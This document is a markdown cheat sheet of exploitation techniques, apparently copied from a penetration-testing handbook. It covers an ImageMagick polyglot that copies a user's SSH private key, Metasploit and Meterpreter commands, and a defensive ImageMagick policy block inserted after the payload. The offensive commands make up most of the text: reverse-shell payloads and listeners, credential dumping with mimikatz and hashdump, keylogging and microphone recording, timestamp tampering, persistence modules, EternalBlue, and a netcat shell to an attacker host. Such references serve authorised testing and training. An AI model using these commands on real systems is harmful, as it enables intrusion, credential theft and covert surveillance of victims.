---
description: >-
  Reference: https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/08_exploitation_tools.md
---

# Exploitation notes

## Exploitation Tools

### Table of Contents

- [Resources](#resources)
- [ImageTragick](#imagetragick)
- [Metasploit](#metasploit)
- [searchsploit](#searchsploit)

### Resources

| Name | Description | URL |
| --- | --- | --- |
| Evil-WinRM | The ultimate WinRM shell for hacking/pentesting | https://github.com/Hackplayers/evil-winrm |
| Exploitalert | Listing of latest Exploits | https://exploitalert.com |
| Metasploit | Metasploit Framework | https://github.com/rapid7/metasploit-framework |
| TheFatRat | TheFatRat is an exploiting tool which compiles a malware with famous payload, and then the compiled malware can be executed on Linux, Windows, Mac and Android. | https://github.com/Screetsec/TheFatRat |

### ImageTragick

https://imagetragick.com/

#### MSL / Polyglot Attack

https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html

##### poc.svg

```xml
<image authenticate='ff" `echo $(cat /home/<USERNAME>/.ssh/id_rsa)> /dev/shm/id_rsa`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="msl:poc.svg" height="100" width="100"/>
  </svg>
</image>
```

##### Executing Payload

```console
$ convert poc.svg poc.png
$ cp /tmp/poc.svg /var/www/html/convert_images/
```
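The polyglot above only works because ImageMagick is allowed to hand the file to the MSL scripting coder and to the PDF delegate (Ghostscript), whose command line the `authenticate` attribute injects into. The usual mitigation is a restrictive `policy.xml`. The following is an added example of such a policy, not part of the original notes or of the ImageMagick project; the file path in the comment is an assumption and differs between distributions and ImageMagick versions.

```xml
<!-- Added example: restrictive ImageMagick security policy.
     Assumed location: /etc/ImageMagick-6/policy.xml (or /etc/ImageMagick-7/policy.xml);
     check with `convert -list policy` (IM6) or `magick -list policy` (IM7). -->
<policymap>
  <!-- MSL lets an "image" carry a script of further read/write/resize calls;
       deny it so an uploaded file cannot drive the pipeline -->
  <policy domain="coder" rights="none" pattern="MSL" />

  <!-- PostScript-family formats are rendered through the Ghostscript delegate,
       the path the poc.svg injection rides on -->
  <policy domain="coder" rights="none" pattern="PDF" />
  <policy domain="coder" rights="none" pattern="PS" />
  <policy domain="coder" rights="none" pattern="PS2" />
  <policy domain="coder" rights="none" pattern="PS3" />
  <policy domain="coder" rights="none" pattern="EPS" />
  <policy domain="coder" rights="none" pattern="XPS" />

  <!-- Other coders that read arbitrary local paths or remote URLs -->
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="TEXT" />
  <policy domain="coder" rights="none" pattern="SHOW" />
  <policy domain="coder" rights="none" pattern="WIN" />
  <policy domain="coder" rights="none" pattern="PLT" />

  <!-- "@file" indirection would let a filename argument pull in /etc/passwd -->
  <policy domain="path" rights="none" pattern="@*" />

  <!-- No external delegate programs at all for untrusted input -->
  <policy domain="delegate" rights="none" pattern="*" />
</policymap>
```

With this policy in place, `convert poc.svg poc.png` is refused at the `pdf:` read and the MSL reference instead of spawning Ghostscript; an upload endpoint should additionally verify the magic bytes of submitted files rather than trusting the extension, since the PoC is an SVG by name and MSL by content.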

### Metasploit

https://github.com/rapid7/metasploit-framework

https://github.com/rapid7/metasploit-payloads

#### General Usage

```console
$ sudo msfdb run                   // start database and msfconsole
$ sudo msfdb init                  // database initialization
$ msfdb --use-defaults delete      // delete existing databases
$ msfdb --use-defaults init        // database initialization
$ msfdb status                     // database status
msf6 > workspace                   // list metasploit workspaces
msf6 > workspace -a <WORKSPACE>    // add a workspace
msf6 > workspace -r <WORKSPACE>    // rename a workspace
msf6 > workspace -d <WORKSPACE>    // delete a workspace
msf6 > workspace -D                // delete all workspaces
msf6 > db_nmap <OPTIONS>           // execute nmap and add output to database
msf6 > hosts                       // read hosts from database
msf6 > services                    // read services from database
msf6 > vulns                       // display vulnerabilities
msf6 > search                      // search within metasploit
msf6 > set RHOST <RHOST>           // set remote host
msf6 > set RPORT <RPORT>           // set remote port
msf6 > run                         // run exploit
msf6 > spool /PATH/TO/FILE         // record screen output to a file
msf6 > save                        // save current state
msf6 > exploit                     // module type: exploit
msf6 > payload                     // module type: payload
msf6 > auxiliary                   // module type: auxiliary
msf6 > encoder                     // module type: encoder
msf6 > nop                         // module type: nop
msf6 > sessions -l                 // display all current sessions
msf6 > sessions -i 1               // switch to session 1
msf6 > sessions -u <ID>            // upgrade shell to meterpreter
msf6 > sessions -k <ID>            // kill specific session
msf6 > sessions -K                 // kill all sessions
msf6 > jobs                        // show all current jobs
msf6 > show payloads               // display available payloads
msf6 > set VERBOSE true            // enable verbose output
msf6 > set forceexploit true       // exploit the target anyway
msf6 > set EXITFUNC thread         // payload exits only its thread, the host process keeps running
msf6 > set AutoLoadStdapi false    // disable autoload of stdapi
msf6 > set PrependMigrate true     // enable automatic process migration
msf6 > set PrependMigrateProc explorer.exe                        // auto migrate to explorer.exe
msf6 > use post/PATH/TO/MODULE                                    // use post exploitation module
msf6 > use post/linux/gather/hashdump                             // use hashdump for Linux
msf6 > use post/multi/manage/shell_to_meterpreter                 // shell to meterpreter
msf6 > use exploit/windows/http/oracle_event_processing_upload    // use a specific module
C:\> Ctrl + z                                    // put active shell channel in background (back to meterpreter)
meterpreter > load stdapi                        // load stdapi
meterpreter > background                         // put meterpreter in background (same as "bg")
meterpreter > shell                              // get a system shell
meterpreter > channel -i <ID>                    // get back to an existing shell channel
meterpreter > ps                                 // list processes
meterpreter > migrate 2236                       // migrate to a process (by PID)
meterpreter > getuid                             // get the user id
meterpreter > sysinfo                            // get system information
meterpreter > search -f <FILE>                   // search for a file
meterpreter > upload                             // upload local files to the target
meterpreter > ipconfig                           // get network configuration
meterpreter > load powershell                    // load the powershell extension
meterpreter > powershell_shell                   // follow-up command for load powershell
meterpreter > powershell_execute                 // execute command
meterpreter > powershell_import                  // import module
meterpreter > powershell_shell                   // interactive shell
meterpreter > powershell_session_remove          // remove session
meterpreter > powershell_execute 'Get-NetNeighbor | Where-Object -Property State -NE "Unreachable" | Select-Object -Property IPAddress'                                // network discovery
meterpreter > powershell_execute '1..254 | foreach { "<XXX.XXX.XXX>.${_}: $(Test-Connection -TimeoutSeconds 1 -Count 1 -ComputerName <XXX.XXX.XXX>.${_} -Quiet)" }'    // network scan
meterpreter > powershell_execute 'Test-NetConnection -ComputerName <RHOST> -Port 80 | Select-Object -Property RemotePort, TcpTestSucceeded'                            // port scan
meterpreter > load kiwi                          // load mimikatz
meterpreter > help kiwi                          // mimikatz help
meterpreter > kiwi_cmd                           // execute mimikatz native command
meterpreter > lsa_dump_sam                       // lsa sam dump
meterpreter > dcsync_ntlm krbtgt                 // dc sync
meterpreter > creds_all                          // dump all credentials
meterpreter > creds_msv                          // msv dump
meterpreter > creds_kerberos                     // kerberos dump
meterpreter > creds_ssp                          // ssp dump
meterpreter > creds_wdigest                      // wdigest dump
meterpreter > getprivs                           // get privileges after loading mimikatz
meterpreter > getsystem                          // gain system privileges if user is member of administrator group
meterpreter > hashdump                           // dump all the user hashes
meterpreter > run post/windows/gather/checkvm    // check whether the target is a VM
meterpreter > run post/multi/recon/local_exploit_suggester    // check for local exploits
meterpreter > run post/windows/manage/enable_rdp              // enable rdp
meterpreter > run post/multi/manage/autoroute                 // add routes through the session
meterpreter > run auxiliary/server/socks4a                    // run socks4a proxy server
meterpreter > keyscan_start                                   // enable keylogger
meterpreter > keyscan_dump                                    // show the keylogger output
meterpreter > screenshare                                     // realtime screen sharing
meterpreter > screenshare -q 100                              // realtime screen sharing at quality 100
meterpreter > record_mic                                      // record mic output
meterpreter > timestomp                                       // modify timestamps
meterpreter > execute -f calc.exe                             // start a program on the victim
meterpreter > portfwd add -l <LPORT> -p <RPORT> -r 127.0.0.1    // port forwarding
```

#### Metasploit through Proxychains

```console
$ proxychains -q msfconsole
```

#### Meterpreter Listener

##### Generate Payload

```console
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o meterpreter_payload.exe
```

##### Setup Listener for Microsoft Windows

```console
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
LHOST => <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
LPORT => <LPORT>
msf6 exploit(multi/handler) > run
```

##### Setup Listener for MacOS

```console
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
LHOST => <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
LPORT => <LPORT>
msf6 exploit(multi/handler) > set PAYLOAD python/meterpreter/reverse_tcp
PAYLOAD => python/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploit
```

#### Download Files

```console
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o <FILE>.exe
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
LHOST => <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
LPORT => <LPORT>
msf6 exploit(multi/handler) > run
C:\> .\<FILE>.exe
meterpreter > download *
```

#### Enumeration

##### SNMP Scan

```console
msf6 > use auxiliary/scanner/snmp/snmp_login
msf6 auxiliary(scanner/snmp/snmp_login) > set RHOSTS <RHOST>
msf6 auxiliary(scanner/snmp/snmp_login) > run
```

##### SNMP Enum

```console
msf6 > use auxiliary/scanner/snmp/snmp_enum
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS <RHOST>
msf6 auxiliary(scanner/snmp/snmp_enum) > run
```

##### Tomcat Enumeration

```console
msf6 > use auxiliary/scanner/http/tomcat_mgr_login
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS <RHOST>
msf6 auxiliary(scanner/http/tomcat_mgr_login) > run
```

##### Exploit Suggester

```console
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1
msf6 post(multi/recon/local_exploit_suggester) > run
```

#### Execute Binaries

##### Port Forwarding with Chisel

```console
meterpreter > execute -Hf chisel.exe -a "client -v <LHOST>:<LPORT> R:1092:socks"
```

#### Pivoting

##### Port Forwarding with Meterpreter

```console
meterpreter > portfwd add -L 127.0.0.1 -l <LPORT> -p <RPORT> -r <RHOST>
```

##### SOCKS Proxy on Meterpreter Sessions

```console
msf6 > use auxiliary/server/socks_proxy
```

##### Pivoting with Meterpreter

```console
meterpreter > run autoroute -s <XXX.XXX.XXX>.0/24
meterpreter > background
msf6 > use auxiliary/scanner/portscan/tcp
```

#### Auxiliary Handling

##### Auxiliary Setup

```console
msf6 > use auxiliary/scanner/http/tvt_nvms_traversal
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set RHOSTS <RHOST>
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set FILEPATH Users/Nathan/Desktop/Passwords.txt
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > run
```

##### Auxiliary Output Directory

```console
/home/kali/.msf4/loot/20200623090635_default_<RHOST>_nvms.traversal_680948.txt
```

#### Persistence

##### Setting up Persistent Access

```console
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o shell.exe
```

Copy the generated shell.exe to the target machine, then configure the persistence module:

```console
msf6 > use exploit/windows/local/persistence
msf6 > set session 1
msf6 > set payload windows/meterpreter/reverse_tcp
```

##### Persistence through persistence_service

```console
msf6 > use exploit/windows/local/persistence_service
msf6 > set session 2
msf6 > set lport 5678
msf6 > exploit
msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set lhost <LHOST>
msf6 > set lport 5678
msf6 > exploit
```

##### Persistence through persistence_exe

```console
msf6 > use post/windows/manage/persistence_exe
msf6 > set session 1
msf6 > set rexepath /root/payload.exe
msf6 > exploit
msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set lhost <LHOST>
msf6 > set lport 1234
msf6 > exploit
```

##### Persistence through Registry

```console
msf6 > use exploit/windows/local/registry_persistence
msf6 > set session 1
msf6 > set lport 7654
msf6 > exploit
msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set lhost <LHOST>
msf6 > set lport 7654
msf6 > exploit
```

#### Exploit Handling

##### WP Shell Upload

```console
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD P@s5w0rd!
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wordpress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS <RHOST>
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST <LHOST>
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LPORT <LPORT>
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run
meterpreter > cd C:/inetpub/wwwroot/wordpress/wp-content/uploads
meterpreter > execute -f nc.exe -a "-e cmd.exe <LHOST> <LPORT>"
```

##### Dedicated Exploit

```console
msf6 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 1
msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST <LHOST>
msf6 exploit(windows/local/ms10_015_kitrap0d) > set payload windows/meterpreter_reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > exploit
```

##### Additional Options

```console
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT <LPORT>
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST <LHOST>
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS <RHOST>
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -j
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 1
```

### searchsploit

```console
$ searchsploit <NAME>                // search by name
$ searchsploit --cve <CVE>           // search by CVE
$ searchsploit -m <ID>               // mirror (copy) an exploit to the current directory
$ searchsploit -x <ID> / <PATH>      // examine an exploit by id or path
```